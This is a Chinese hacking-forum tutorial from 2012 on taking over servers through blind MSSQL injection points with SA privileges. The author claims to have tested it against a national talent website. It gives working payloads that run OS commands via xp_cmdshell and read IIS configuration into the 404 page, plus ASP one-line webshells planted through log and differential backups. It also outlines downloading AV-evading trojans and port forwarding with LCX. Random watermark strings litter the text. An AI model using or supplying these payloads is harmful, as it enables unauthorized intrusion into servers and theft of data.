找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2577|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————% H& o* N% r  k+ y) ~1 e
0 l1 t" F: W+ r! Y  |; f1 D4 s; E

7 d( R9 M. ~8 N0 |* |0 Z                                                             欢迎高手访问指导,欢迎新手朋友交流学习。( Z1 H6 _4 C0 o# z! s/ O: n  V
5 J' Y0 N3 v7 l3 m1 W+ m
                                                                 
4 X6 v! N% L* c+ D; @. P' c                                                                 
$ T: E6 q  u* [- }; f                                                                  论坛: http://www.90team.net/
- v% J; A2 \; o7 O: e8 |  `8 X6 v% Y7 m* v# F. G1 c

4 n  z$ f7 j. U* M& Y0 _1 |# r1 b) R- T7 u" s* Z+ C+ u, L3 r
友情检测国家人才网
2 @9 {6 _# V; ?. I( V% Y1 E* @% D" i8 F3 s) J* d

. y8 B5 L+ j# w/ Q内容:MSSQL注入SA权限不显错模式下的入侵: N9 [: r9 l# N7 Z1 Z( ]6 N  h
7 n5 t. c1 [* N( m
: N) o; y+ _7 b- K
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
; e+ h4 ]6 a/ B3 n( K% B3 t
$ \/ g% ^6 N1 x6 l1 C8 Z我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。6 h- y2 ?/ `  H, J. x9 J
3 F+ Q1 I9 x+ p0 H6 y% y9 P. {

3 _) [, A1 U8 n) z2 u/ p: V这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
( I# @1 y" x* g* v, L  u' Q: L$ e- q5 I4 m; w! i6 D
思路:
( f' r. [! V* z
, k* d4 Z7 {7 G$ ?6 H  a2 |! F) B首先:
0 g- g  a1 K, f8 p1 z: [* i+ [% g+ q
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。) x, Y0 g: g% x- x/ _! [  d, ^

4 |5 P1 ?# s% Z; g) N- T+ D1.日志备份获得Webshell4 ^' E  S* B! v: c# e5 n
. E8 h, d) Y& y* D' ~! Z
2.数据库差异备份获得Webshell
9 e0 @" z' K' A. j7 O. i7 }
  H0 g) t2 Z" \; f2 N6 ]8 B6 ~4.直接下载免杀远控木马。
9 b9 E+ ~& l9 W% Z
+ y* ]& T( T! o0 x0 A2 {4 N5.直接下载LCX将服务器端口转发出来
- ^! f8 H4 O$ c/ E  `$ h
- \) q/ ]& C: [+ d- D% h6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。# v( p! M8 Z8 O
2 G; R% [. V) s) u; z; R. Z

% p6 A. }* l9 ?' e0 W! j* P( X
' x, Q% {, z0 r1 x' V# B' f在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, 3 W: a. F/ [$ ]: y

. _. A9 t$ r4 y; z我直接演示后面一个方法, F9 N$ }2 S& f" V2 [" Y8 F3 }

2 A+ e, n$ _& Q4 n1 f- U4 }# J) R' ~/ s% m; K
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL 4 h8 _7 Q' K/ x5 Y* d* k, U! e
; W) X* o) E, l  D) M! l! y2 M
7 Q# p8 [# o4 V, j
; {0 I1 j* H; z6 ^4 f: d4 \  X: @

4 Y/ I+ M9 G: N' M◆日志备份:9 x5 P' z0 U7 ~& @
9 P1 J; ~& l* u8 `* x
. Z' g: n0 B9 K6 u- Q' t/ |: H
1. 进行初始备份5 G' f4 Y. ^% G. t9 \8 G
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
: [* t( Q6 M+ v' ?8 I7 }
" l, e1 Y6 \) U" B: P# m3 X7 ~7 C2. 插入数据! J% I8 E8 v* W; _: ?: p( B6 h
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
- y. V6 ~1 e! N9 P/ W" h) G' _2 {6 L0 W5 }# _' i. p
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
+ U/ w% d( v# Y5 s$ w' ~8 ^) h  
5 _" C; {% t% _( z3. 备份并获得文件,删除临时表
" P  W: G1 Y& F3 n* p: G! j) ^" t;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--, _9 Z6 W/ S  `
" c6 P& p4 L) ?# b' S+ R
) I" I# p( R3 a, L9 G

- K  X) V$ \; d* f- T◆数据库差异备份
7 |( H. i: u3 Y/ D" C3 \" n4 V
* T% t2 P9 X5 V(1. 进行差异备份准备工作+ ^9 C" H6 b- S  g  f2 x$ h/ v+ C/ h
0 P# R: v& L6 r- M# F, J
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--, a  a- H$ p" U. q) {9 W& E9 \. i

* H9 |8 m) [8 B7 W  a+ y: G上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码, L* v5 H0 \( {  k
; J* @! d2 @( i' \' u4 K# F

; A+ F" W: l' w4 O) ~" a(2. 将数据写入到数据库- d7 E$ g2 x: S! U) v4 y
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- 1 K* \0 j6 J& ]5 a' M9 u- L5 f+ T
% U1 G$ D5 s5 u( t+ ]% j
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
: C( A; t3 n2 t4 L! y1 A* Y$ Y4 m7 u, n( F$ g2 B
3. 备份数据库并清理临时文件6 }1 s8 B9 }" G. F! w8 c' W
# q( w: r6 w+ ^, D
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--6 ~! d9 S; b+ v
5 `; S( M4 s  {
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 - q; `) [0 g: N

* E5 ?* l" `2 q' D7 I# Z8 p7 ~2 ^) U

6 V# Y; o( {3 W7 f; G. J用^转义字符来写ASP(一句话木马)文件的方法:   
* h7 r% b4 R0 V) I" s# ~- o$ m3 e
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--& J) s! ^, @" v- E6 ^

# l  p4 G; n$ x, I! u& Z9 \: f. }( x2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp ) w7 Q3 q3 b4 A2 l

1 b" N* `6 S) ^  x( r读取IIS配置信息获取web路径# p. y9 U& K% L8 A0 Q

1 ]$ @' b8 V- X9 o, v& e     7 \. ^9 Y' U% R0 t2 `
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--/ }2 l- M% F8 m+ G* U% s

$ k- J8 Z* O) C) f- s" E执行命令
  N" |: Z) D" n' L6 s4 y     
9 U5 A9 u7 N! }3 _: S3 Z( \2 h     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--8 H( Y/ c! b9 r- B9 V
1 p( p$ D7 N' a" @+ X7 ~( h

/ L" [) G: J7 i: x: N6 |) c9 Q/ r: ?. V* c
: w7 [! I* ~! l: w7 H

. H& D3 ^  ~* o7 N0 n
: R: s; s8 i/ Y( {, [& J' x* z; o4 Y
7 S* i2 H/ ?+ s- s6 F$ B& a

3 a! Z) I3 A, g. t$ \
) k% @6 v) g' ~  z) ]8 C% F4 o
6 O& C0 V2 ^+ h4 H! I; u! ~* T9 b; t1 M3 T) q  m* i4 C5 b
$ D7 E0 n( q& h6 F2 u
+ r* i% g) Z) r* I' ]3 X
  _, s0 w- y: _: w/ ^( q

5 i5 ]: w7 h5 J: `* T9 Q
0 t& e, @6 x5 \. c3 \5 i
/ K: t3 O* ]/ ?' i0 t$ a; c, S% Q* P

% I% R3 V' E6 a' ?( }/ k; v5 g$ u- H" l, J. c& {& Y

; g3 V% v3 I! }: I
* z) X" {9 B8 b( V8 V* q- X) ?9 T3 ?: n6 l! s/ h& K2 j" u. g
+ F- h0 }+ f  V. @4 @
9 n! w0 R$ R7 m
, r1 H) Y) j* C  N/ m7 ~, z7 \
2 t1 D0 Z6 q8 _2 E

' @/ p5 U9 V) c. |) p3 R! S  I0 [" P# O5 n0 s" \, o
# e$ t6 J7 @7 N9 @, }; B. }. u

! I! V  f0 S9 ?% ^0 |" G4 H0 O: F- I/ ~5 |% g
* o1 X0 _* i/ `2 |) W: G

/ ~& e/ a" A5 J4 s4 [8 ~3 l% U
, s8 L9 G/ w; U, X0 |6 S2 B2 ]) d
: r1 T# ~, k8 q" f6 q8 a  c+ J, h$ ~. k' m' q7 B( k7 }
: i/ m) Y7 b9 e
( @) M- w: E) _' n

! b6 [* X; Y8 [$ `: a; t5 O3 X, o
. C1 Y* ~, S. f6 o6 f7 Y
$ |% \& r3 `) H1 q8 ?: x# r& R8 e- ]# @4 E
4 A4 e. w/ b! Y

& \1 I1 j2 K3 P) o9 ?' v
1 L$ c  n( ^/ A
1 a) V7 T# v  _6 y. b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表